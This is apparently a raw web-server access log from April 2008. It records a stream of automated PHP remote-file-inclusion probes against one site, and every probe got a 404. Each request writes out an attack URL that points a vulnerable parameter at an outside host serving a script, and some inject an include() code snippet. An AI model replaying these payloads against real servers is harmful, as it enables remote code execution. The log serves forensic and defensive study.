216.73.103.57 - - [01/Apr/2008:08:00:16 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:00:16 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:08:00:18 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:08:00:18 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:08:00:18 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:00:23 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:00:23 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:00:23 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:10 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:10 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:11 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:11 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:11 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:11 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:13 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:13 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:13 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:42 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:43 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:01:43 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:08:01:54 -0700] "GET //plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:08:01:54 -0700] "GET /logs//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:08:08:38 -0700] "GET /logs/beacon/language/1/splash.lang.php?languagePath=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:08:08:43 -0700] "GET /beacon/language/1/splash.lang.php?languagePath=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:09:13 -0700] "GET /esupport/admin/autoclose.php?subd=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:09:13 -0700] "GET /logs/esupport/admin/autoclose.php?subd=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:09:17 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:09:18 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:09:23 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
62.65.34.76 - - [01/Apr/2008:08:09:33 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:08:09:41 -0700] "GET /logs/access_071201.log/samplefaqsupport.php?path[docroot]=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:08:09:41 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:08:09:42 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:10:12 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:10:12 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:10:14 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:08:11:44 -0700] "GET /logs/access.log/class/errors.php?error=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:08:11:44 -0700] "GET /class/errors.php?error=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:08:11:45 -0700] "GET /logs/class/errors.php?error=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
82.98.141.70 - - [01/Apr/2008:08:12:55 -0700] "GET /logs/index.php?option=com_ricette&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/language/spanish/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.bsfadvisors.com"
82.98.141.70 - - [01/Apr/2008:08:12:55 -0700] "GET /index.php?option=com_ricette&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/language/spanish/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.bsfadvisors.com"
70.84.7.82 - - [01/Apr/2008:08:13:18 -0700] "GET /logs/access_080201.log//components/com_simpleboard/image_upload.php?sbp=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.84.7.82 - - [01/Apr/2008:08:13:19 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.84.7.82 - - [01/Apr/2008:08:13:19 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
82.98.141.70 - - [01/Apr/2008:08:13:22 -0700] "GET /index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/language/spanish/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.bsfadvisors.com"
82.98.141.70 - - [01/Apr/2008:08:13:22 -0700] "GET /logs/index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/language/spanish/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:08:15:34 -0700] "GET /logs/access.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:08:15:34 -0700] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:08:15:51 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:08:15:55 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.bsfadvisors.com"
213.203.223.115 - - [01/Apr/2008:08:16:06 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.203.223.115 - - [01/Apr/2008:08:16:06 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.203.223.115 - - [01/Apr/2008:08:16:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
70.84.7.82 - - [01/Apr/2008:08:17:05 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
82.94.235.198 - - [01/Apr/2008:08:17:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.bsfadvisors.com"
82.94.235.198 - - [01/Apr/2008:08:17:37 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
74.55.6.34 - - [01/Apr/2008:08:18:56 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.55.6.34 - - [01/Apr/2008:08:18:56 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.55.6.34 - - [01/Apr/2008:08:18:57 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:08:19:02 -0700] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:08:19:02 -0700] "GET /index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:20:53 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:20:54 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:21:00 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:21:14 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:21:15 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:08:21:16 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:21:29 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:21:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:21:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:21:35 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:21:35 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:21:36 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:08:21:55 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:08:21:55 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:08:21:56 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:08:21:59 -0700] "GET /logs/access.log//image_upload.php?sbp=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:08:22:00 -0700] "GET //image_upload.php?sbp=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:08:22:00 -0700] "GET /logs//image_upload.php?sbp=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:08:22:04 -0700] "GET /logs/access_080201.log//image_upload.php?sbp=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:08:22:14 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:08:22:15 -0700] "GET //config/dbutil.bck.php?confdir=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:08:22:15 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:08:24:11 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:25:28 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:25:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:25:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
212.227.60.6 - - [01/Apr/2008:08:25:31 -0700] "GET /logs/access_080101.log//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/F2dpvS59.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:25:41 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:25:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
212.227.60.6 - - [01/Apr/2008:08:25:52 -0700] "GET //redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/F2dpvS59.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.227.60.6 - - [01/Apr/2008:08:26:02 -0700] "GET /logs//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/F2dpvS59.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:26:25 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:26:26 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:26:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:26:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:26:31 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:26:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
